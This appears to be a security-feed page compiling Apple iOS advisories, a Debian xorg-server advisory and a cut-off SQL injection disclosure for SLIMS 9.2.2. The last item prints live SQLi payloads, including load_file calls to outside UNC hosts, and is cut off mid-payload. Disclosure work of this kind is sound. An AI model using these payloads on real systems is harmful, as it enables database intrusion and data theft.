Apple Security Advisory 2022-12-13-3 - iOS 16.1.2 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-12-13-3 iOS 16.1.2iOS 16.1.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213516.WebKitAvailable for: iPhone 8 and laterImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited against versions of iOS releasedbefore iOS 15.1.Description: A type confusion issue was addressed with improved statehandling.WebKit Bugzilla: 248266CVE-2022-42856: Clément Lecigne of Google's Threat Analysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.1.2".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYEACgkQ4RjMIDkeNxll4hAAolqnH+W3gE3w2Xri3wUchwkj6WPhfWcwwc+l0cxUxiDqzhGSkW4kNTVIeCjENaJ4WfsK7COfxx8qnmQtcqV8P406XtDomeE96Rm/euCEzkSpVPSs4S8+YwvOqRNWVbWmWQ1gKFSqkuZb2Y5IAnA+KI3Fw1M1iq8Cbs/bkUVjNfrIrrPgl19BercEOjsjq+BQS15dIq84GUiSv/KTU31NKMeSQLB8O9+u91tuBex2b+1mdwb15K1R17OIe/exVA2qnQFctfhWu2uh2izckATylQjtvQHMr0pAwdEoLyRl1xXrW62DeVwWBsn0bxUhjSfS/clmXyN/hL1ocgUrHrI9yAVST5oug/LqR8RjTkgTBcGF9C0YMXaexvA0y2AhF70pl67UESleBSRddayFAW2lZkV/YdJosxGLsRviy8jdiiQ4VJ5xI9TAECbUGgF2qHVSz4gnlyyDUfUqHUmjLej48qCMbadY4IQQmvW30yiCW+shHfaLzCBYZ2cLhUCD7IqU7C1+KE+bJ1Y/k7EXOkLWhZ9go7kKUF6OfpVd6OPIYd4R38eghUXU4ZviQwYQlkXm1Q+DZrwaOvMf0kMkCA/10ktuzhKSpiCI/47BqcE8VYi0CCbOUaSZSPi6P0jlpuIsxCd1UKkGaTsfdJIyeNY1VPHkiOl2BYpIelCqqhOiNHc==wMpD-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-3

Apple Security Advisory 2022-12-13-2 - iOS 15.7.2 and iPadOS 15.7.2 addresses bypass, code execution, integer overflow, out of bounds write, and spoofing vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-12-13-2 iOS 15.7.2 and iPadOS 15.7.2iOS 15.7.2 and iPadOS 15.7.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213531.AppleAVDAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Parsing a maliciously crafted video file may lead to kernelcode executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-46694: Andrey Labunets and Nikita TarakanovAVEVideoEncoderAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A logic issue was addressed with improved checks.CVE-2022-42848: ABC Research s.r.oFile SystemAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to break out of its sandboxDescription: This issue was addressed with improved checks.CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-YearLabGraphics DriverAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Parsing a maliciously crafted video file may lead tounexpected system terminationDescription: The issue was addressed with improved memory handling.CVE-2022-42846: Willy R. Vasquez of The University of Texas at AustinIOHIDFamilyAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A race condition was addressed with improved statehandling.CVE-2022-42864: Tommy Muir (@Muirey03)iTunes StoreAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An issue existed in the parsing of URLs. This issue wasaddressed with improved input validation.CVE-2022-42837: Weijia Dai (@dwj1210) of Momo SecurityKernelAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A race condition was addressed with additionalvalidation.CVE-2022-46689: Ian Beer of Google Project Zerolibxml2Available for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An integer overflow was addressed through improved inputvalidation.CVE-2022-40303: Maddie Stone of Google Project Zerolibxml2Available for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: This issue was addressed with improved checks.CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google ProjectZeropppAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2022-42840: an anonymous researcherPreferencesAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to use arbitrary entitlementsDescription: A logic issue was addressed with improved statemanagement.CVE-2022-42855: Ivan Fratric of Google Project ZeroSafariAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Visiting a website that frames malicious content may lead toUI spoofingDescription: A spoofing issue existed in the handling of URLs. Thisissue was addressed with improved input validation.CVE-2022-46695: KirtiKumar Anandrao RamchandaniWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory consumption issue was addressed with improvedmemory handling.WebKit Bugzilla: 245466CVE-2022-46691: an anonymous researcherWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may result in thedisclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2022-42852: hazbinhotel working with Trend Micro Zero DayInitiativeWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may bypass SameOrigin PolicyDescription: A logic issue was addressed with improved statemanagement.WebKit Bugzilla: 246783CVE-2022-46692: KirtiKumar Anandrao RamchandaniWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedinput validation.WebKit Bugzilla: 247562CVE-2022-46700: Samuel Groß of Google V8 SecurityWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited against versions of iOS releasedbefore iOS 15.1.Description: A type confusion issue was addressed with improved statehandling.WebKit Bugzilla: 248266CVE-2022-42856: Clément Lecigne of Google's Threat Analysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.7.2 and iPadOS 15.7.2".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYIACgkQ4RjMIDkeNxn07xAA2gJjgY+Ql7WKtXSxsU4snP+8d2zDgD5hKkZVETJrKG1TGwAKK/YdW0Ug8nmj/DIU+RRsU8KpGLiN4TGsHVot1GaDwwMQ/HCUG4bHFjknc0TqrTkUCfG6rnkhbFouinoNfyPf7gcmLkQg2AhrNjA/a9QJzfmX2XKtGybIN1kFDd8eMKb/setgVQUS12h4N6YBI4WjSGvyZ8vagqpMRAz0An4lSEoa21CN1ViM0E4wBWIyU8Ux05fN+Lvn2gefdjyGV5IP63z3kYe4D/Vt6yatBo1n7ERM9If7IMGO5O8DJqrynTZ3q1kCsxcRQheJHkPZDF/8ogjAdNiOzqybSzhhcNk0uteTSXX1tYGvRos7GyDSTG6/KjuFvB60Wohwzr16o6VkcZyaU41cA9dWKrv3+RRTm7UR2/CKGngrjcnm4jAotR+pjtQU444vECGQVTx/qat7Eu+IFe2llm8JcjBHjx1R6Rbb8sqmzD4lVDja/aZ2491vsVdOytq+cZ59nZqwbG7vo8mBow+zEcoKsh8pAGRYoLW3WU1MetNt04V9d+7Fv7wG/+BNkzHNqOhOa7+4SwD8wvApxdF2+hZgSD26owwkbfG4hnf71w4DSDPpwRC/CoRvhDMZToSlsPLIWP29jIII09N8TNW3PVlIAjquv7oxir7BohtGu5ioSmgI3fQ==wLMf-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-2

Apple Security Advisory 2022-12-13-1 - iOS 16.2 and iPadOS 16.2 addresses bypass, code execution, out of bounds write, spoofing, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-12-13-1 iOS 16.2 and iPadOS 16.2iOS 16.2 and iPadOS 16.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213530.AccountsAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A user may be able to view sensitive user informationDescription: This issue was addressed with improved data protection.CVE-2022-42843: Mickey Jin (@patch1t)AppleAVDAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Parsing a maliciously crafted video file may lead to kernelcode executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-46694: Andrey Labunets and Nikita TarakanovAppleMobileFileIntegrityAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: This issue was addressed by enabling hardened runtime.CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRingAVEVideoEncoderAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A logic issue was addressed with improved checks.CVE-2022-42848: ABC Research s.r.oCoreServicesAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: Multiple issues were addressed by removing thevulnerable code.CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) ofOffensive SecurityGPU DriversAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-46702: Xia0o0o0o of W4terDr0p, Sun Yat-sen UniversityGraphics DriverAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2022-42850: Willy R. Vasquez of The University of Texas at AustinGraphics DriverAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Parsing a maliciously crafted video file may lead tounexpected system terminationDescription: The issue was addressed with improved memory handling.CVE-2022-42846: Willy R. Vasquez of The University of Texas at AustinImageIOAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing a maliciously crafted file may lead to arbitrarycode executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-46693: Mickey Jin (@patch1t)ImageIOAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Parsing a maliciously crafted TIFF file may lead todisclosure of user informationDescription: The issue was addressed with improved memory handling.CVE-2022-42851: Mickey Jin (@patch1t)IOHIDFamilyAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A race condition was addressed with improved statehandling.CVE-2022-42864: Tommy Muir (@Muirey03)IOMobileFrameBufferAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-46690: John Aakerblom (@jaakerblom)iTunes StoreAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An issue existed in the parsing of URLs. This issue wasaddressed with improved input validation.CVE-2022-42837: Weijia Dai (@dwj1210) of Momo SecurityKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A race condition was addressed with additionalvalidation.CVE-2022-46689: Ian Beer of Google Project ZeroKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Connecting to a malicious NFS server may lead to arbitrarycode execution with kernel privilegesDescription: The issue was addressed with improved bounds checks.CVE-2022-46701: Felix Poulin-BelangerKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause kernel code executionDescription: The issue was addressed with improved memory handling.CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-YearLabKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to break out of its sandboxDescription: This issue was addressed with improved checks.CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-YearLabKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to break out of its sandboxDescription: The issue was addressed with improved memory handling.CVE-2022-42844: pattern-f (@pattern_F_) of Ant Security Light-YearLabKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app with root privileges may be able to execute arbitrarycode with kernel privilegesDescription: The issue was addressed with improved memory handling.CVE-2022-42845: Adam Doupé of ASU SEFCOMPhotosAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Shake-to-undo may allow a deleted photo to be re-surfacedwithout authenticationDescription: The issue was addressed with improved bounds checks.CVE-2022-32943: an anonymous researcherpppAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2022-42840: an anonymous researcherPreferencesAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to use arbitrary entitlementsDescription: A logic issue was addressed with improved statemanagement.CVE-2022-42855: Ivan Fratric of Google Project ZeroPrintingAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: This issue was addressed by removing the vulnerablecode.CVE-2022-42862: Mickey Jin (@patch1t)SafariAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Visiting a website that frames malicious content may lead toUI spoofingDescription: A spoofing issue existed in the handling of URLs. Thisissue was addressed with improved input validation.CVE-2022-46695: KirtiKumar Anandrao RamchandaniSoftware UpdateAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A user may be able to elevate privilegesDescription: An access issue existed with privileged API calls. Thisissue was addressed with additional restrictions.CVE-2022-42849: Mickey Jin (@patch1t)WeatherAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to read sensitive location informationDescription: The issue was addressed with improved handling ofcaches.CVE-2022-42866: an anonymous researcherWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A use after free issue was addressed with improvedmemory management.WebKit Bugzilla: 245521CVE-2022-42867: Maddie Stone of Google Project ZeroWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory consumption issue was addressed with improvedmemory handling.WebKit Bugzilla: 245466CVE-2022-46691: an anonymous researcherWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may bypass SameOrigin PolicyDescription: A logic issue was addressed with improved statemanagement.WebKit Bugzilla: 246783CVE-2022-46692: KirtiKumar Anandrao RamchandaniWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may result in thedisclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2022-42852: hazbinhotel working with Trend Micro Zero DayInitiativeWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedinput validation.WebKit Bugzilla: 246942CVE-2022-46696: Samuel Groß of Google V8 SecurityWebKit Bugzilla: 247562CVE-2022-46700: Samuel Groß of Google V8 SecurityWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may disclosesensitive user informationDescription: A logic issue was addressed with improved checks.CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs& DNSLab, Korea Univ.WebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedstate management.WebKit Bugzilla: 247420CVE-2022-46699: Samuel Groß of Google V8 SecurityWebKit Bugzilla: 244622CVE-2022-42863: an anonymous researcherAdditional recognitionKernelWe would like to acknowledge Zweig of Kunlun Lab and pattern-f(@pattern_F_) of Ant Security Light-Year Lab for their assistance.Safari ExtensionsWe would like to acknowledge Oliver Dunk and Christian R. of1Password for their assistance.WebKitWe would like to acknowledge an anonymous researcher and scarlet fortheir assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.2 and iPadOS 16.2".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYIACgkQ4RjMIDkeNxmnGxAAuO8CwNDPYn+yyq7VIRB6+sCaV962MC2c7TFzU+R1waBBaG57NmJQeANL5645QVNL/5k0TaFiSV/dFg15YvBkLgC6JVHeKebYvboSHB0wsfxejfwYnYFLNc44xriqdQSarmp61Aw4270LFRjV1XokOGuEzo4U3InyhiawceAVR/qvteNDxETnsiANjyaPRnx1d2K22+VZAFRtVjLgFLkBwAguamuMe8vIaqP71giORZNfX+w+GduszAqYSpo5aPC8G56GmHGZnSid/utBa2CqXfVRMyUmnYYukPrYACdy4WkTKWOWCbPrCbkTVWc43jsWhPqsMFopyy4K+SaCZqNdcpIag8n5uvCsf0tLPIUPTMRXSj3w1WOq1++6NV3cZp6RaFVYJ3twU2D1q/Vj8VXILNPvECzGNlOxRJu0H7w3VD5ZdZ16Gsc8T62CER5CSJr49fj5ixLCP9HepmIK5Rz0UXMxmylUANk2h88HK9hr7/s1EOYtCVjTEYQ2c1ESd87HYz24iYnqaL5d8KDFiGQCVfuwnz2keWO7Lc2E+8OUqqYTWfCoSWprWnSUZR31xA+JnPSS4WBP4RzitUmAiP5sdulF0jg4IZ0y0RUwWI4lD4vv0z9glb++rRHhPJj9uuirFcmKJ1BSfEN1glq/gGW8SP1vuq1BU+fIdeHtw4XeeIw==qV7H-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-1

Debian Linux Security Advisory 5304-1 - Jan-Niklas Sohn discovered several vulnerabilities in X server extensions in the X.Org X server, which may result in privilege escalation if the X server is running privileged.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5304-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 20, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2022-4283 CVE-2022-46340 CVE-2022-46341 CVE-2022-46342  
                 CVE-2022-46343 CVE-2022-46344  
Debian Bug     : 1026071

Jan-Niklas Sohn discovered several vulnerabilities in X server extensions  
in the X.Org X server, which may result in privilege escalation if the X  
server is running privileged.

For the stable distribution (bullseye), these problems have been fixed in  
version 2:1.20.11-1+deb11u4.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOiEgFfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qysw//b3WxFj6Bvmix6MNP/D/izMHimLJrgWZthnCpgFIQxwpNrho3YexS3dkh  
nfFIv6FKkFHoWvDDkURee2AROshngIgcl0/yrlouV9gaR0ZtVCI//Ku9t5hTatTd  
/fC9AlIq/s9zgeslq8RzDwhcbQQtT4M0aqQbCt5V9pJGPJ5WTWp9l0D/KVkkiIfU  
6CIJn1xvw6Nu/3m9BWG0VrHP83jTVJi6KhGfFAZkYhTsfw/TOfLUN5nZnQFnNvrR  
+XwruR3Zy1ZA5pStWPVuuGQwi0xuhy3weiz92mGUhRsavw4SrJsL54k+gg5Su2lW  
dzgiRVpjERtbLKXSQxin1nMM3LUePxnFvHwmTaC00XUL2YCLuCECl7NDMIncjJiF  
+rYEEUtAvPOjIC4bvt3KUDfj3pf37/YqhEXgauqc0Gm3irAM/gkxypSszEeYaxne  
7THA+DYh3fnrpZA1tGyCzS4gUPLaxsGU/cRej9ES57rKyZY9n/gdO6r6sPybgZIL  
lRGOt2Unl3eIgMkrH2THLg0v/Rume5Gi4demI5GAoxOw4r500jU+X+/BZLd09pyC  
lhtDUFfcaf7J/LyT/EM98M/mAp4iCq4lFuZbCxoGyip/HsaPtWb4EQw9mVzkAByM  
BnwC/La8g0z0n/b/eMNM2hd7BajKH4uobmvfRicyCc5YG3CrE10Èpj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5304-1

Senayan Library Management System version 9.2.2 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 Multiple SQLi-Not sanitizing correctly cookie session.## Author: nu11secur1ty## Date: 12.20.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2## Reference:https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi## Description:The manual insertion `point 3, 4, and 5` appears to be vulnerable to SQLinjection attacks. The payload '+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+' was submittedin the manual insertion `point 3`.This payload injects a SQL sub-query that calls MySQL's load_file functionwith a UNC file path that references a URL on an external domain.After manual testing: The parameters class, collType and membershipType arevulnerable to SQLi attacks!The application interacted with that domain, indicating that the injectedSQL query was executed.The attacker can take information from all database columns of this systemby using this vulnerability.Not sanitizing correctly cookie session.## STATUS: HIGH Vulnerability[+] Payload:```MySQL00---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(selectload_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+''RLIKE (SELECT (CASE WHEN (2920=2920) THEN 